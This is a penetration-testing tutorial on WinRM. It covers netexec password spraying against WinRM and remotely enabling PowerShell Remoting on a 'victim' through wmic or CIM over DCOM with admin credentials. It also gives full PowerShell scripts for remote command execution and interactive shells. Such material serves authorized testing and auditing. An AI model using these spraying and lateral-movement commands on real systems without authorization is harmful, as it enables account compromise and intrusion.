WinRM

Pentesting WinRM - TCP Ports 5985,5986

Theory

Windows Remote Management (WinRM) is Microsoft's implementation of the WS-Management protocol: remote management of Windows machines over HTTP(S) using SOAP messages. It exposes WMI over that transport, so you can think of it as an HTTP-based API to WMI, and PowerShell Remoting runs on top of it. If WinRM is enabled on a machine and you hold credentials for a local administrator (or a member of the "Remote Management Users" group), it's trivial to administer it remotely from PowerShell. In fact, you can drop into an interactive remote PowerShell session (as if you were using SSH!). The easiest way to detect whether WinRM is available is to check whether the port is open. WinRM listens on one of two ports: 5985/tcp (HTTP) or 5986/tcp (HTTPS); legacy WinRM 1.1 on Vista/Server 2008 used 80/443 instead. Note that "HTTP" on 5985 is not automatically plaintext: with Kerberos or NTLM (Negotiate) authentication the SOAP payload is encrypted at the message level, and only Basic authentication with the service's AllowUnencrypted setting enabled puts credentials and commands on the wire in the clear.

Practice

Targeting Accounts

Be careful: brute-forcing WinRM is just an authentication attempt against the domain, so every failed login counts toward the account lockout threshold and can lock users out. Check the lockout policy first (for example with `netexec smb <IP> -u <user> -p <pass> --pass-pol`), spray one password per round instead of running a full wordlist, and use `--no-bruteforce` when you want user/password lists paired line by line instead of every combination. A successful WinRM login is marked `(Pwn3d!)`, meaning you can execute commands as that user.

netexec winrm <IP> -d <Domain Name> -u <userlist> -p <passwlist>
# safer: one password per run, keep going after the first hit
netexec winrm <IP> -d <Domain Name> -u <userlist> -p '<single password>' --continue-on-success

Enable WinRM

WinRM is enabled by default on Windows Server 2012 and later (client editions of Windows ship with it disabled), which makes it an attractive lateral-movement vector. For hosts where it is not enabled, we can turn it on with PowerShell.

If we have access to an elevated PowerShell prompt on the victim, we can enable it with the first command below. The second command is often shown alongside it, but it is a client-side setting: TrustedHosts lists the remote hosts this machine's WinRM client will authenticate to with NTLM (which is what happens when you connect by IP address or to a non-domain host). It does not open inbound access, so it belongs on the machine that initiates the connection (typically your own box when you target a host by IP), and `*` trusts every host:

Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts * -Force

We can also enable WinRM remotely over WMI (DCOM, 135/tcp plus a dynamic RPC port) using wmic, provided we hold administrative credentials on the target; `/user:` and `/password:` supply them explicitly if they differ from the current session. Note that wmic is deprecated and is no longer present on recent Windows 11 and Server 2025 builds, so expect to fall back to the CIM cmdlets or Invoke-WmiMethod there.

wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"
wmic /node:<REMOTE_HOST> /user:<DOMAIN\user> /password:<password> process call create "powershell enable-psremoting -force"
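The whole enable-and-verify procedure above, as an added PowerShell example (this is editorial example code, not part of the original page). It assumes an elevated prompt on the victim for part A, and a host/credential pair (`10.10.10.5`, `DOMAIN\admin`, `Passw0rd!`, all made-up placeholders) with admin rights for part B, which replaces the deprecated wmic call with the CIM cmdlets forced onto DCOM.

```powershell
# Added example (not from the original page). Two ways to enable WinRM on a host you
# already administer, plus the checks that tell you the listener is really reachable.
# Placeholders 10.10.10.5 / DOMAIN\admin / Passw0rd! are made up; replace them.

# --- A. Locally, from an elevated prompt on the victim ---
# -Force skips the prompts; -SkipNetworkProfileCheck is needed when any adapter is on the
# "Public" profile, otherwise Enable-PSRemoting errors out and creates no firewall rule.
Enable-PSRemoting -Force -SkipNetworkProfileCheck

# What did that actually do? A listener on all addresses, port 5985, and a firewall rule.
Get-ChildItem WSMan:\localhost\Listener | ForEach-Object {
    Get-ChildItem $_.PSPath | Select-Object Name, Value     # Address, Transport, Port, ...
}
Get-NetFirewallRule -Name 'WINRM-HTTP-In-TCP*' | Select-Object Name, Enabled, Profile
Get-Service WinRM | Select-Object Status, StartType         # expect Running / Automatic

# Settings that decide how an attacker (or auditor) can talk to it:
Get-Item WSMan:\localhost\Service\AllowUnencrypted          # true => Basic over HTTP is plaintext
Get-ChildItem WSMan:\localhost\Service\Auth                 # Basic/Kerberos/Negotiate/CredSSP/Certificate

# --- B. Remotely over WMI, when WinRM is off but you hold admin credentials ---
# The CIM cmdlets default to WS-Man, i.e. the very service we are trying to turn on,
# so force DCOM (135/tcp + dynamic RPC), which is what wmic used under the hood.
$Target = '10.10.10.5'
$Cred   = New-Object System.Management.Automation.PSCredential(
    'DOMAIN\admin', (ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force))
$Dcom   = New-CimSessionOption -Protocol Dcom
$Cim    = New-CimSession -ComputerName $Target -Credential $Cred -SessionOption $Dcom

$r = Invoke-CimMethod -CimSession $Cim -ClassName Win32_Process -MethodName Create -Arguments @{
    CommandLine = 'powershell.exe -NoProfile -Command "Enable-PSRemoting -Force -SkipNetworkProfileCheck"'
}
"Win32_Process.Create returned {0} (0 = success), PID {1}" -f $r.ReturnValue, $r.ProcessId

# Confirm from the attacking side: an unauthenticated WS-Man Identify should now answer
# with ProductVendor 'Microsoft Corporation' once the listener is up.
Start-Sleep -Seconds 5
Test-WSMan -ComputerName $Target
Remove-CimSession $Cim
```

Part A is also a quick audit of a host you did not configure yourself: a `Basic = true` under `Service\Auth` combined with `AllowUnencrypted = true` means credentials cross the wire in the clear on 5985, and a listener bound to `*` with the Public-profile firewall rule enabled is reachable from any network the host is on.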

Execute Remote Commands
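The "remote PowerShell session, as if over SSH" that the Theory section describes, as an added PowerShell example from the attacker's side (editorial example code, not from the original page). The target address and the `DOMAIN\user` / `Passw0rd!` credential are made-up placeholders; the example assumes the account is a local administrator or a member of "Remote Management Users" on the target.

```powershell
# Added example (not from the original page): confirm a WinRM listener and use it.
# Placeholders 10.10.10.5 / DOMAIN\user / Passw0rd! are made up; replace them.
$Target = '10.10.10.5'
$Cred   = New-Object System.Management.Automation.PSCredential(
    'DOMAIN\user', (ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force))

# 1. Is anything listening? 5985 = HTTP, 5986 = HTTPS.
foreach ($Port in 5985, 5986) {
    $r = Test-NetConnection -ComputerName $Target -Port $Port -WarningAction SilentlyContinue
    "{0}/tcp open: {1}" -f $Port, $r.TcpTestSucceeded
}

# 2. WS-Man Identify. The unauthenticated call needs no credentials and confirms it is
#    WinRM (ProductVendor 'Microsoft Corporation'); the OS/stack version is only returned
#    when authenticated, so the second call doubles as a credential check.
Test-WSMan -ComputerName $Target
Test-WSMan -ComputerName $Target -Credential $Cred -Authentication Negotiate

# 3. Connecting by IP forces NTLM (there is no Kerberos SPN for an IP address), and the
#    WinRM *client* refuses NTLM to hosts not in its TrustedHosts. This is the setting that
#    belongs on the attacking machine, not on the victim; scope it to the target, not '*'.
Set-Item WSMan:\localhost\Client\TrustedHosts -Value $Target -Concatenate -Force

# 4. One-off command execution over HTTP/5985 (the equivalent of `ssh host cmd`).
Invoke-Command -ComputerName $Target -Credential $Cred -ScriptBlock {
    whoami
    hostname
    Get-LocalGroupMember -Group 'Remote Management Users' | Select-Object Name, ObjectClass
}

# 5. Interactive shell over the HTTPS listener. Self-signed certificates are the norm on
#    5986, so skip the CA/CN checks; with -UseSSL the TrustedHosts step is not required.
$Opt  = New-PSSessionOption -SkipCACheck -SkipCNCheck
$Sess = New-PSSession -ComputerName $Target -Credential $Cred -UseSSL -Port 5986 -SessionOption $Opt
Enter-PSSession -Session $Sess      # typed interactively: prompt becomes [10.10.10.5]: PS C:\...>
# ... work inside the remote session, then:
Exit-PSSession
Remove-PSSession $Sess
```

Steps 4 and 5 are the same protocol the `netexec winrm` check above drives; the difference is only that `Invoke-Command` gives you a full remote runspace (objects, not text), while `Enter-PSSession` gives the interactive prompt. If step 4 fails with an access-denied error even though step 2 authenticated, the account is valid but not in Administrators or "Remote Management Users" on the target.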

Resources
